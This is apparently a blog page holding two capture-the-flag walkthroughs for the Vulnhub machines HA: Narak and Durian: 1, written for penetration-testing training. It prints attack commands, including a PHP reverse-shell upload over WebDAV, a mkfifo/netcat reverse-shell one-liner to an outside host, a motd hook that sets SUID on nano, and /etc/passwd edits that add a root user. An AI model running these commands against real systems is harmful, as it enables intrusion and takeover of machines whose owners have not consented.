HA: Narak: Vulnhub Walkthrough

Introduction

Today we are going to crack this vulnerable machine called HA: Narak. This is a Capture the Flag type of challenge.  Overall, it was an Intermediate machine to crack.

Download Lab from here.

 

Penetration Testing Methodology

·         Network Scanning

o   Netdiscover

o   Nmap

·         Enumeration

o   Browsing HTTP Service

o   Directory Bruteforce

·         Exploitation

o   Exploiting PUT Vulnerability using cadaver

·         Post-Exploitation

o   Enumerating SUID permission

o   Decrypting BrainFuck Encryption

o   Reading User Flag

·         Privilege Escalation

o   Logging as Inferno user using SSH

o   Appending the motd file

o   Reconnecting the SSH session

o   Enumerating the permission on nano

o   Adding User with Root Privileges

·         Getting the Root Flag

Walkthrough

Network Scanning

To attack any machine, we need to find the IP Address of the machine. This can be done using the netdiscover command. To find the IP Address, we need to co-relate the MAC Address of the machine that can be obtained from the Virtual Machine Configuration Setting. The IP Address of the machine was found to be 192.168.0.136.

Following the netdiscover scan, we need a Nmap scan to get the information about the services running on the virtual machine. A version Nmap scan reveals that 2 services: SSH (22), HTTP (80) are running on the application.

nmap -A 192.168.0.136

Enumeration

Since we have the HTTP service running on the virtual machine, let’s take a look at the webpage hosted.

http://192.168.0.136

Just a basic webpage with some exciting images of hell. Since there weren’t any new clues, we went back to some more enumeration. Time for some Directory Bruteforce. Just in a few seconds and dirb gives us a /webdav directory. 

dirb http://192.168.0.136/

We open the WebDAV directory in the web browser to find ourselves an Authentication Panel. Since we don’t have any credentials. We can’t proceed. Bruteforcing without any information is not that useful. We will get back to it in a few moments. 

Now, that we didn’t find any new directories in the normal dirb scan. We tried an extension filter dirb scan. We tried a bunch of other extensions but we got a new result with the .txt extension. We have tips.txt. Let’s take a look at it.

dirb http://192.168.0.136/ -X .txt

It says that to open the door to Narak can be found in creds.txt. Another text files. Let’s try to find this creds.txt.

http://192.168.0.136/tips.txt

Since directory bruteforce any more didn’t give us any more clues regarding the creds.txt. We went back to the port scan. This time we tried a UDP scan. This gave us the port 69. Noice. The service running on TFPT.

nmap -sU -p69 192.168.0.136

 

We access the TFTP service and see that there is the creds.txt that was mentioned earlier. It contains some encoded text. Looked like Base64. Let’s decode it. After decoding we found that there are some credentials. Nice.

tftp 192.168.0.136

get creds.txt

echo “eWFtZG9vdDpTd2FyZw==” | base64 -d

 

Exploitation

Now, we had the /webdav directory to access this set of credentials. We enumerated and found that WebDAV is used to upload and download files on the apache server. A quick search can tell us that it suffers from PUT Vulnerability. We decided to use this vulnerability and gain a shell on the machine. To do this we used the cadaver tool. After using the credentials, we use put to upload a php reverse shell to the target machine.

cadaver http://192.168.0.136/webdav

put /root/shell.php

Now, that we have uploaded a php shell on the target machine, we created a listener targeting the port that was in the php shell on our local system to capture the session that will get created after we execute it. On the browser, after entering the credentials we can see the uploaded shell.

nc -lvp 1234

Post-Exploitation

When we clicked the php shell, our payload gets executed and we have a session on the target machine. We can use the python one-liner to convert the shell into a TTY shell. After getting TTY we work on elevating the privileges on the session that we just generated. We check the SUID permissions and find that there is a custom script named hell.sh. Let’s take a look at the script. There is some encryption inside the script. It seems to be brainfuck encryption.

find / -type f -perm -ug=rwx 2>/dev/null

cat /mnt/hell.sh

We decode the encryption and find the word “chitragupt”

Before moving on further, let’s take some time and look for the user flag. As the flag will be in one of the user’s home directory. Time to look for the users in the machine. There are 3 users named inferno, Narak, and yamdoot. Yamdoot seems to be the TFPT user. We were not able to access the Narak directory that means that it is the high privilege user. We enumerate the inferno user and found ourselves the user flag.

cd /home

ls

cd inferno

ls -la

cat user.txt

Privilege Escalation

Earlier we saw that there are special permissions on the motd file. That means we need to navigate our way to root using the motd privilege escalation. As we found the chitragupt keyword earlier, we used it like a password and logged in to an SSH session as the inferno user.

Username: inferno

Password: chitragupt

Now as we know that to escalate privileges from the motd files, we need to add the nano editor into the motd header file. So, we used the echo command to do that as shown in the image below.

ssh inferno@192.168.0.136

which nano

ls -la /bin/nano

echo “sudo chmod u+s  /bin/nano” >> /etc/update-motd.d/00-header

As we know that to execute the motd files, we need to exit the current SSH session and connect it again. After doing so we check if the nano binary now has the privileges, we set to it in the previous step. Now we will use this nano to edit the /etc/passwd and create ourselves a user that has the root privileges.

ssh inferno@192.168.0.136

ls -al /bin/nano

nano /etc/passwd

To add a user entry, we will be needing a password hash. This can be generated using the OpenSSL command.

openssl passwd -1 -salt user3 pass123

Now, we created a user by the name of Jeenali, gave it root privileges, and added the hash that we generated earlier as shown in the image below.

 

Now, all that left is to log in as the jeenali aka newly created user, and read the root flag.

tail  -n 3 /etc/passwd

su jeenali

cd /root

ls

cat root.txt

Durian: 1 Vulnhub Walkthrough

Today we are going to solve another boot2root challenge called "Durian: 1".  It's available at VulnHub for penetration testing and you can download it from here.

The merit of making this lab is due to SunCSR Team. Let's start and learn how to break it down successfully.

Level: Hard

Penetration Testing Methodology

Reconnaissance

§  Netdiscover

§  Nmap

Enumeration

§  Dirsearch

§  Linpeas.sh

Exploiting

• LFI + RCE log poisoning

Privilege Escalation

§  Abuse of capabilities gdb

§  Capture the flag

Walkthrough

Reconnaissance

We are looking for the machine with netdiscover

$ netdiscover -i ethX

So, let's start by running map to all ports.

$ nmap -p- 192.168.10.184

 

Enumeration

We add the IP address to our /etc/hosts to work more comfortably and we list services, directories and files of the three exposed web services.

We find interesting and yet vulnerable services like this OpenLiteSpeed Web Server.

 

This version is vulnerable to null-byte poisoning.

But even if it is too "juicy" it will not serve us, it is a "rabbit hole".

We continue through the port 80 web service:

We used dirsearch with a medium dictionary and found a couple of directories that look interesting, but we will go to "/cgi-data/".

We access the directory and find a file that as its name indicates will allow us to load files. But we have to find out which variable the file needs.

There are two options (surely there are more) to find out.

Option 1:

The syntax is commented from the source code.

Option 2:

You will find sometimes with audits or pentest that the code of the application will be totally black box. Wfuzz is usually very good for these cases:

We do a proof of concept as evidence of vulnerability.

Exploiting

This was for me the most complicated part of the box, as it took me more than a day to list the machine's custom log file.

For the enumeration, I used burp, a custom dictionary of log paths and the word "durian" (machine name).

Request:

Response:

Once found (and excited hehe) we do a proof of concept of RCE (Remote Code Execution)

Request:

 

Response:

Here I had trouble running a reverse shell directly with "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f". So I decided to use the "pentestmonkeys" webshell, raise a python server in my kali and download it in the “/var/www/html/blog/” path where I had writing permissions and later we can run it.

Here we see how the server has downloaded it from our python server.

Now we raise a listening netcat and execute the webshell from the url "http://IP/blog/shell.php".

Once inside, we execute as always our two commands to get an interactive revshell.

 

Privilege Escalation (root)

We check the user's "durian" folder and execute the command "sudo -l". We see that we can execute two commands as the root user and without a password. (Now you will see that I did the escalation without either of those two commands)

We run "linpeas.sh" and list that we can abuse the "gdb" binary for its capabilities.

We execute the following syntax that will allow us to scale privileges as the root user and read our proof.txt.

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contacted on LinkedIn and Twitter.